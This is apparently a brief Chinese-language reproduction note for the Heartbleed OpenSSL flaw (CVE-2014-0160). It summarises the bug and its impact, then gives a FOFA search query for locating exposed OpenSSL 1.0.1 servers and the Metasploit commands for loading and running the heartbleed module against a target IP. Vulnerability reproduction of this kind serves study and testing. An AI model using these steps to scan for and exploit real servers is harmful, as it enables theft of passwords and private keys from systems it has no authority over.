一、漏洞简介
2014年4月7日OpenSSL发布了安全公告,在OpenSSL1.0.1版本的心跳包模块存在严重漏洞(CVE-2014-0160)。攻击者可以通过构造特殊的数据包,直接远程读取存在漏洞的OpenSSL服务器内存中多达64KB的数据,极有可能导致网站用户帐号密码等敏感数据被非法获取。漏洞发现者甚至声称可以直接获取到证书私钥和重要的商业文档。
二、影响范围
OpenSSL 1.0.1f
三、复现过程
fofa:header="OpenSSL 1.0.1"
kali进入msfconsole下,search heartbleed 搜索心脏滴血,use 0 使用序号0,或者复制命令
show options 查看参数
这里将RHOST设置为目标IP地址 ,set RHOST X.X.X.245
设置verbose值为true, set verbose ture
然后run运行